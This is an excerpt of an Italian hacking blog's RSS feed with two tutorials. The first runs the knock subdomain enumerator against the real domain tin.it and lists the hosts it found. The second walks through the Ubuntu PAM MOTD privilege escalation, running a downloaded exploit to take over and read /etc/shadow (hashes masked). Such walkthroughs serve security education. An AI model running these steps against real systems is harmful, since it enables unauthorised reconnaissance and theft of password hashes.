<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>PillolHacking.Net &#187; Linux</title>
	<atom:link href="http://www.pillolhacking.net/category/linux/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.pillolhacking.net</link>
	<description>Pillole di Informatica Non Convenzionale</description>
	<lastBuildDate>Tue, 31 Jan 2012 03:23:45 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>A Caccia di Sottodomini con Knock</title>
		<link>http://www.pillolhacking.net/2010/08/09/a-caccia-di-sottodomini-con-knock/</link>
		<comments>http://www.pillolhacking.net/2010/08/09/a-caccia-di-sottodomini-con-knock/#comments</comments>
		<pubDate>Mon, 09 Aug 2010 20:55:57 +0000</pubDate>
		<dc:creator>Angelo Righi</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[dns]]></category>
		<category><![CDATA[knock]]></category>
		<category><![CDATA[scanner]]></category>

		<guid isPermaLink="false">http://www.pillolhacking.net/?p=1474</guid>
		<description><![CDATA[Un volta identificato un obiettivo, l’hacker ha la necessità di trovare un punto debole, un punto vulnerabile. Non è necessario che la vulnerabilità sia macroscopica: anche una piccola fessura può essere utilizzata come leva per poter accedere ad un livello successivo e superiore di privilegio, fino al raggiungimento dell’obiettivo (un particolare documento, il controllo di [...]]]></description>
			<content:encoded><![CDATA[<p>Un  volta identificato un obiettivo, l’hacker ha la necessità di trovare un  punto debole, un punto vulnerabile. Non è necessario che la  vulnerabilità sia macroscopica: anche una piccola fessura può essere  utilizzata come leva per poter accedere ad un livello successivo e  superiore di privilegio, fino al raggiungimento dell’obiettivo (un  particolare documento, il controllo di un sistema, di una rete&#8230;). Per  approfondire il concetto consiglio la lettura di “<a href="../2009/03/10/da-sql-injection-a-root-in-12-passi/">Da Sql-Injection a Root in 12 Passi</a>”.</p>
<p>Nella  fase di raccolta informazioni, alla ricerca di una “superficie” a cui  appigliarsi per poter iniziare un attacco o pianificare una strategia,  uno strumento che enumeri i sottodomini del dominio target, può essere  uno strumento prezioso.</p>
<p>Gianni Amato ha realizzato <a href="http://knock.gianniamato.it/">knock,</a> che è appunto un tool che effettua un “dictionary attack”, cercando  sottodomini provando una lista di nomi noti appartenenti ad un  dizionario interno; è possibile fornire anche un dizionario esterno con  una quantità maggiore di nomi di sottodominio da testare.  Knock è in  grado anche di effettuare il <a href="https://secure.wikimedia.org/wikipedia/en/wiki/DNS_zone_transfer">trasferimento di zona</a>.</p>
<p>Knock  è uno script realizzato in python che può essere esguito sia su Windows  sia su Linux. Per poter effettuare il trasferimento di zona è  necessario installare il modulo dnspython.</p>
<p>Di seguito, la mia prova su strada effettuata su Ubuntu 10.04. Inizio con l’installazione opzionale di dnspython:</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;">angelor<span style="color: #000000; font-weight: bold;">@</span>xronin:~<span style="color: #000000; font-weight: bold;">/</span>Scrivania$ <span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">apt-get</span> <span style="color: #c20cb9; font-weight: bold;">install</span> python-dnspython</pre></div></div>

<p>Una volta scaricato knock dal sito <a href="http://knock.gianniamato.it/">http://knock.gianniamato.it/</a> vado ad eseguirlo. L’obiettivo della scansione è il dominio tin.it.</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;">angelor<span style="color: #000000; font-weight: bold;">@</span>xronin:~<span style="color: #000000; font-weight: bold;">/</span>Scaricati$ <span style="color: #c20cb9; font-weight: bold;">chmod</span> +x .<span style="color: #000000; font-weight: bold;">/</span>knock.py
angelor<span style="color: #000000; font-weight: bold;">@</span>xronin:~<span style="color: #000000; font-weight: bold;">/</span>Scaricati$ .<span style="color: #000000; font-weight: bold;">/</span>knock.py
&nbsp;
angelor<span style="color: #000000; font-weight: bold;">@</span>xronin:~<span style="color: #000000; font-weight: bold;">/</span>Scaricati$ .<span style="color: #000000; font-weight: bold;">/</span>knock.py tin.it
Knock v1.4.2b by Gianni <span style="color: #ff0000;">'guelfoweb'</span> Amato <span style="color: #7a0874; font-weight: bold;">&#40;</span> http:<span style="color: #000000; font-weight: bold;">//</span>knock.gianniamato.it <span style="color: #7a0874; font-weight: bold;">&#41;</span>
&nbsp;
<span style="color: #7a0874; font-weight: bold;">&#91;</span>+<span style="color: #7a0874; font-weight: bold;">&#93;</span> Testing domain
&nbsp;
www.tin.it             62.211.65.12
&nbsp;
<span style="color: #7a0874; font-weight: bold;">&#91;</span>+<span style="color: #7a0874; font-weight: bold;">&#93;</span> Dns resolving
&nbsp;
Domain name               Ip address              Name server
&nbsp;
tin.it                62.211.65.12           tin.virgilio.it
&nbsp;
Found <span style="color: #000000;">1</span> host<span style="color: #7a0874; font-weight: bold;">&#40;</span>s<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000; font-weight: bold;">for</span> tin.it
&nbsp;
<span style="color: #7a0874; font-weight: bold;">&#91;</span>+<span style="color: #7a0874; font-weight: bold;">&#93;</span> Testing wildcard
&nbsp;
Ok, no wildcard found.
&nbsp;
<span style="color: #7a0874; font-weight: bold;">&#91;</span>+<span style="color: #7a0874; font-weight: bold;">&#93;</span> Scanning <span style="color: #000000; font-weight: bold;">for</span> subdomain on tin.it
<span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #000000; font-weight: bold;">!</span><span style="color: #7a0874; font-weight: bold;">&#93;</span> Wordlist not specified. I scannig with my internal wordlist...
Estimated <span style="color: #000000; font-weight: bold;">time</span> about <span style="color: #000000;">604.24</span> seconds
&nbsp;
Subdomain                Ip address              Name server
&nbsp;
broadcast.tin.it          62.211.65.253           videotest.tin.it
cache.tin.it            212.216.172.62             ns1.tin.it
chat.tin.it             195.31.190.197     host197-<span style="color: #000000;">190</span>-static.31-<span style="color: #000000;">195</span>-b.business.telecomitalia.it
commerce.tin.it          212.216.174.146         commerce.cs.tin.it
community.tin.it          194.243.155.63          community.tin.it
delta.tin.it           212.216.174.252          tinforma.tin.it
email.tin.it            195.31.190.67      host67-<span style="color: #000000;">190</span>-static.31-<span style="color: #000000;">195</span>-b.business.telecomitalia.it
flash.tin.it            62.211.65.251            mmedia.tin.it
ftp.tin.it             194.243.155.68             ftp.tin.it
help.tin.it              62.211.65.14           help.virgilio.it
info.tin.it            212.216.174.119            info.tin.it
irc.tin.it             62.211.73.231             irc3.tin.it
ircd.tin.it             62.211.73.236             ircd.tin.it
localhost.tin.it            127.0.0.1                localhost
loghost.tin.it             127.0.0.1                localhost
mail.tin.it              62.211.72.20             mail.tin.it
mailhost.tin.it            62.211.72.20             mail.tin.it
media.tin.it            62.211.65.252             media.tin.it
monitor.tin.it          212.216.172.106          phobos.cs.tin.it
news.tin.it             62.211.73.198             news.tin.it
ns1.tin.it             212.216.172.62             ns1.tin.it
ns2.tin.it            212.216.172.162             ns2.tin.it
ns3.tin.it            212.216.112.222             ns3.tin.it
ns4.tin.it            212.216.112.112             ns4.tin.it
orion.tin.it            194.243.155.19           ospiti.tin.it
partner.tin.it           194.243.155.17           partner.tin.it
private.tin.it           212.216.182.71           private.tin.it
rd.tin.it               62.211.65.13         tinstage.virgilio.it
smtp.tin.it              62.211.72.32             smtp.tin.it
vc.tin.it             212.216.174.140             vc.tin.it
wap.tin.it            212.216.174.194             wap.tin.it
webmail.tin.it            62.211.65.12           tin.virgilio.it
www.tin.it              62.211.65.12           tin.virgilio.it
www3.tin.it             194.243.155.8             www3.tin.it
&nbsp;
Found <span style="color: #000000;">34</span> subdomain<span style="color: #7a0874; font-weight: bold;">&#40;</span>s<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000; font-weight: bold;">in</span> <span style="color: #000000;">34</span> host<span style="color: #7a0874; font-weight: bold;">&#40;</span>s<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000; font-weight: bold;">in</span> <span style="color: #000000;">738.48</span> second<span style="color: #7a0874; font-weight: bold;">&#40;</span>s<span style="color: #7a0874; font-weight: bold;">&#41;</span></pre></div></div>

<p>Questo  è l’esito della ricerca. Pare non ci sia nulla di clamoroso, però sono  emersi alcuni host potenzialmente interessanti (che è orion.tin.it? e  vc.tin.it?).  L’obiettivo finale è quello di trovare host di test,  nascosti, o qualsiasi cosa possa contenere delle vulnerabilità, o possa  fornire un appiglio come punto di partenza per poter stabilire una testa  di ponte da cui sferrare l’attacco.</p>
<p>Non  è il caso di questo esempio, ma in alcune occasioni (più frequenti di  quello che si pensi), possono emergere anche indirizzi ip utilizzati  nella rete interna.</p>
<p>Insomma, un altro buon tool di Gianni Amato, tool utile nella fase di raccolta informazioni di un penetration test.</p>
<!-- Social Bookmarking Reloaded BEGIN --><div class="social_bookmark"><em>Segnala presso:</em><br /><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://del.icio.us/post?url=http://www.pillolhacking.net/2010/08/09/a-caccia-di-sottodomini-con-knock/&amp;title=A+Caccia+di+Sottodomini+con+Knock" title="Aggiungi 'A Caccia di Sottodomini con Knock' a Del.icio.us"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/delicious.png" title="Aggiungi 'A Caccia di Sottodomini con Knock' a Del.icio.us" alt="Aggiungi 'A Caccia di Sottodomini con Knock' a Del.icio.us" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://digg.com/submit?phase=2&amp;url=http://www.pillolhacking.net/2010/08/09/a-caccia-di-sottodomini-con-knock/&amp;title=A+Caccia+di+Sottodomini+con+Knock" title="Aggiungi 'A Caccia di Sottodomini con Knock' a digg"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/digg.png" title="Aggiungi 'A Caccia di Sottodomini con Knock' a digg" alt="Aggiungi 'A Caccia di Sottodomini con Knock' a digg" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technorati.com/faves?add=http://www.pillolhacking.net/2010/08/09/a-caccia-di-sottodomini-con-knock/" title="Aggiungi 'A Caccia di Sottodomini con Knock' a Technorati"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technorati.png" title="Aggiungi 'A Caccia di Sottodomini con Knock' a Technorati" alt="Aggiungi 'A Caccia di Sottodomini con Knock' a Technorati" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.pillolhacking.net/2010/08/09/a-caccia-di-sottodomini-con-knock/&amp;title=A+Caccia+di+Sottodomini+con+Knock" title="Aggiungi 'A Caccia di Sottodomini con Knock' a Google Bookmarks"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/google.png" title="Aggiungi 'A Caccia di Sottodomini con Knock' a Google Bookmarks" alt="Aggiungi 'A Caccia di Sottodomini con Knock' a Google Bookmarks" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://segnalo.alice.it/post.html.php?url=http://www.pillolhacking.net/2010/08/09/a-caccia-di-sottodomini-con-knock/&amp;title=A+Caccia+di+Sottodomini+con+Knock" title="Aggiungi 'A Caccia di Sottodomini con Knock' a Segnalo"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/segnalo.png" title="Aggiungi 'A Caccia di Sottodomini con Knock' a Segnalo" alt="Aggiungi 'A Caccia di Sottodomini con Knock' a Segnalo" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://oknotizie.alice.it/post?url=http://www.pillolhacking.net/2010/08/09/a-caccia-di-sottodomini-con-knock/&amp;title=A+Caccia+di+Sottodomini+con+Knock" title="Aggiungi 'A Caccia di Sottodomini con Knock' a OKnotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/oknotizie.gif" title="Aggiungi 'A Caccia di Sottodomini con Knock' a OKnotizie" alt="Aggiungi 'A Caccia di Sottodomini con Knock' a OKnotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.diggita.it/submit.php?title=A+Caccia+di+Sottodomini+con+Knock&amp;url=http://www.pillolhacking.net/2010/08/09/a-caccia-di-sottodomini-con-knock/" title="Aggiungi 'A Caccia di Sottodomini con Knock' a Diggita"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/diggita.png" title="Aggiungi 'A Caccia di Sottodomini con Knock' a Diggita" alt="Aggiungi 'A Caccia di Sottodomini con Knock' a Diggita" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.facebook.com/share.php?u=http://www.pillolhacking.net/2010/08/09/a-caccia-di-sottodomini-con-knock/&amp;t=A+Caccia+di+Sottodomini+con+Knock" title="Aggiungi 'A Caccia di Sottodomini con Knock' a FaceBook"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/facebook.png" title="Aggiungi 'A Caccia di Sottodomini con Knock' a FaceBook" alt="Aggiungi 'A Caccia di Sottodomini con Knock' a FaceBook" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.upnews.it/submit?url=http://www.pillolhacking.net/2010/08/09/a-caccia-di-sottodomini-con-knock/&amp;title=A+Caccia+di+Sottodomini+con+Knock" title="Aggiungi 'A Caccia di Sottodomini con Knock' a Upnews"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/upnews.png" title="Aggiungi 'A Caccia di Sottodomini con Knock' a Upnews" alt="Aggiungi 'A Caccia di Sottodomini con Knock' a Upnews" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://notizieflash.com/submit.php?title=A+Caccia+di+Sottodomini+con+Knock&amp;url=http://www.pillolhacking.net/2010/08/09/a-caccia-di-sottodomini-con-knock/" title="Aggiungi 'A Caccia di Sottodomini con Knock' a NotizieFlash"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/notizieflash.png" title="Aggiungi 'A Caccia di Sottodomini con Knock' a NotizieFlash" alt="Aggiungi 'A Caccia di Sottodomini con Knock' a NotizieFlash" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://twitter.com/home?status=http://www.pillolhacking.net/2010/08/09/a-caccia-di-sottodomini-con-knock/" title="Aggiungi 'A Caccia di Sottodomini con Knock' a Twitter"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/twitter.png" title="Aggiungi 'A Caccia di Sottodomini con Knock' a Twitter" alt="Aggiungi 'A Caccia di Sottodomini con Knock' a Twitter" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technotizie.it/posta_ok?action=f2&amp;title=A+Caccia+di+Sottodomini+con+Knock&amp;url=http://www.pillolhacking.net/2010/08/09/a-caccia-di-sottodomini-con-knock/" title="Aggiungi 'A Caccia di Sottodomini con Knock' a Technotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technotizie.png" title="Aggiungi 'A Caccia di Sottodomini con Knock' a Technotizie" alt="Aggiungi 'A Caccia di Sottodomini con Knock' a Technotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://friendfeed.com/share/bookmarklet/frame#title=A+Caccia+di+Sottodomini+con+Knock&amp;url=http://www.pillolhacking.net/2010/08/09/a-caccia-di-sottodomini-con-knock/" title="Aggiungi 'A Caccia di Sottodomini con Knock' a FriendFeed"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/friendfeed.png" title="Aggiungi 'A Caccia di Sottodomini con Knock' a FriendFeed" alt="Aggiungi 'A Caccia di Sottodomini con Knock' a FriendFeed" /></a></div>
<!-- Social Bookmarking Reloaded END -->]]></content:encoded>
			<wfw:commentRss>http://www.pillolhacking.net/2010/08/09/a-caccia-di-sottodomini-con-knock/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04</title>
		<link>http://www.pillolhacking.net/2010/07/10/vulnerabilita-pam-local-privilege-escalation-in-ubuntu-9-10-e-10-04/</link>
		<comments>http://www.pillolhacking.net/2010/07/10/vulnerabilita-pam-local-privilege-escalation-in-ubuntu-9-10-e-10-04/#comments</comments>
		<pubDate>Sat, 10 Jul 2010 18:30:31 +0000</pubDate>
		<dc:creator>Angelo Righi</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[ubuntu]]></category>

		<guid isPermaLink="false">http://www.pillolhacking.net/?p=1428</guid>
		<description><![CDATA[L’Ubuntu Security Notice 959-1 pubblicata il 7 Luglio  rende nota l’esistenza di un bug che consente ad un utente normale di elevare i propri privilegi a livello di root, permettendogli di accedere a risorse altrimenti non accessibili. Questo bug (scoperto da Denies Excoffier), di cui esiste già una patch e che appartiene alla categoria  “local [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;">
<p style="text-align: center;"><img class="aligncenter size-full wp-image-1512" title="linux" src="http://www.pillolhacking.net/wp-content/uploads/2010/08/linux.png" alt="" width="385" height="288" /></p>
<p>L’Ubuntu Security Notice  959-1 pubblicata il 7 Luglio  <a href="http://www.ubuntu.com/usn/usn-959-1">rende nota</a> l’esistenza di un bug  che consente ad un utente normale di elevare i propri  privilegi a livello di root, permettendogli di accedere a risorse  altrimenti non accessibili.</p>
<p>Questo bug (scoperto da Denies Excoffier), di  cui esiste già una patch e che appartiene alla categoria  “local  privilege escalation”, si annida nel modulo PAM MOTD di Ubuntu. I  programmatori hanno commesso un errore nella gestione dei permessi  durante la creazione di un file da parte dell&#8217;utente.</p>
<p>L’esistenza di un  exploit (disponibile su SecurityFocus) in questa occasione non è  fondamentale, anche se semplifica ulteriormente la procedura di sfruttamento  di questa vulnerabilità. Infatti il cuore di questo exploit è la  creazione di un link simbolico tra una directory nella home dell’utente e  la risorsa proibita a cui si vuole accedere.</p>
<p>Per essere più chiari:  con questo bug un qualsiasi “utente semplice” che abbia le credenziali  di accesso al sistema, può scalare  i privilegi e catturare il file  contenente gli <a href="http://www.pillolhacking.net/2008/07/23/introduzione-alle-funzioni-hash/">hash</a> delle password (/etc/shadow), normalmente non  accessibile.</p>
<p>Di  seguito mostro passo-passo l’esecuzione di questa operazione che ho  svolto sul mio Ubuntu Server 9.10:</p>
<p>Eccomi loggato in Ubuntu Server 9.10:</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;">angelor<span style="color: #000000; font-weight: bold;">@</span>ubuntu:~$  <span style="color: #c20cb9; font-weight: bold;">uname</span> <span style="color: #660033;">-a</span>
Linux  ubuntu 2.6.31-<span style="color: #000000;">14</span>-generic <span style="color: #666666; font-style: italic;">#48-Ubuntu SMP Fri Oct 16 14:04:26 UTC 2009  i686 GNU/Linux</span></pre></div></div>

<p>Intanto  vetifico i permessi del file degli hash delle password:</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;">angelor<span style="color: #000000; font-weight: bold;">@</span>ubuntu:~$ <span style="color: #c20cb9; font-weight: bold;">ls</span>  <span style="color: #660033;">-l</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>shadow
<span style="color: #660033;">-rw-r-----</span> <span style="color: #000000;">1</span> root shadow <span style="color: #000000;">926</span> <span style="color: #000000;">2010</span>-05-02 <span style="color: #000000;">21</span>:<span style="color: #000000;">19</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>shadow</pre></div></div>

<p>correttamente  appartengono a root;  quindi verifico se posso accedere al file  /etc/shadow, il file degli hash delle password:</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;">angelor<span style="color: #000000; font-weight: bold;">@</span>ubuntu:~$ <span style="color: #c20cb9; font-weight: bold;">cat</span>  <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>shadow
<span style="color: #c20cb9; font-weight: bold;">cat</span>:  <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>shadow: Permission denied</pre></div></div>

<p>come previsto l’accesso è negato.<br />
Ora eseguo l’<a href="http://www.securityfocus.com/bid/41465/exploit">exploit</a> che ho scaricato da  SecurityFocus:</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;">angelor<span style="color: #000000; font-weight: bold;">@</span>ubuntu:~$ .<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">41465</span>.sh <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>shadow</pre></div></div>

<p>per verificare la  riuscita dell’exploit chiudo la shell ed effettuo un nuovo login.<br />
Una  volta rientrato  verifico di nuovo i pernessi del file /etc/shadow:</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;">angelor<span style="color: #000000; font-weight: bold;">@</span>ubuntu:~$ <span style="color: #c20cb9; font-weight: bold;">ls</span>  <span style="color: #660033;">-al</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>shadow
<span style="color: #660033;">-rw-r-----</span> <span style="color: #000000;">1</span> angelor angelor <span style="color: #000000;">926</span> <span style="color: #000000;">2010</span>-05-02 <span style="color: #000000;">21</span>:<span style="color: #000000;">19</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>shadow</pre></div></div>

<p>Questa volta il file appartiene a me! Quindi posso visualizzarlo:</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;">angelor<span style="color: #000000; font-weight: bold;">@</span>ubuntu:~$ <span style="color: #c20cb9; font-weight: bold;">cat</span>  <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>shadow
root:xxxxxxxxxxxxxxxxxxxxxxxxxxx:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
daemon:<span style="color: #000000; font-weight: bold;">*</span>:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
bin:<span style="color: #000000; font-weight: bold;">*</span>:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
sys:<span style="color: #000000; font-weight: bold;">*</span>:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
<span style="color: #c20cb9; font-weight: bold;">sync</span>:<span style="color: #000000; font-weight: bold;">*</span>:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
games:<span style="color: #000000; font-weight: bold;">*</span>:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
<span style="color: #c20cb9; font-weight: bold;">man</span>:<span style="color: #000000; font-weight: bold;">*</span>:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
<span style="color: #c20cb9; font-weight: bold;">lp</span>:<span style="color: #000000; font-weight: bold;">*</span>:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
mail:<span style="color: #000000; font-weight: bold;">*</span>:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
news:<span style="color: #000000; font-weight: bold;">*</span>:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
uucp:<span style="color: #000000; font-weight: bold;">*</span>:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
proxy:<span style="color: #000000; font-weight: bold;">*</span>:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
www-data:<span style="color: #000000; font-weight: bold;">*</span>:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
backup:<span style="color: #000000; font-weight: bold;">*</span>:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
list:<span style="color: #000000; font-weight: bold;">*</span>:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
irc:<span style="color: #000000; font-weight: bold;">*</span>:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
gnats:<span style="color: #000000; font-weight: bold;">*</span>:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
nobody:<span style="color: #000000; font-weight: bold;">*</span>:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
libuuid:<span style="color: #000000; font-weight: bold;">!</span>:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
syslog:<span style="color: #000000; font-weight: bold;">*</span>:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
mysql:<span style="color: #000000; font-weight: bold;">!</span>:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
landscape:<span style="color: #000000; font-weight: bold;">*</span>:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
postfix:<span style="color: #000000; font-weight: bold;">*</span>:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
dovecot:<span style="color: #000000; font-weight: bold;">*</span>:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
sshd:<span style="color: #000000; font-weight: bold;">*</span>:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
tomcat6:<span style="color: #000000; font-weight: bold;">*</span>:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
angelor:xxxxxxxxxxxxxxxxxxxxxxxxxxx:<span style="color: #000000;">14731</span>:<span style="color: #000000;">0</span>:<span style="color: #000000;">99999</span>:<span style="color: #000000;">7</span>:::
angelor<span style="color: #000000; font-weight: bold;">@</span>ubuntu:~$</pre></div></div>

<p>Ho letto il file delle  password senza essere root: questo è il significato di privilege  escalation. A questo punto non mi resta che tentare di craccare le  password. ma questa è un’altra storia e la racconterò un’altra volta.</p>
<p>Questa vulnerabilità  colpisce tutte le piattaforme di Ubuntu 9.10 e Ubuntu 10.04. E’ già  disponibile la patch, basta effettuare un aggiornamento dal menù di  sistema.</p>
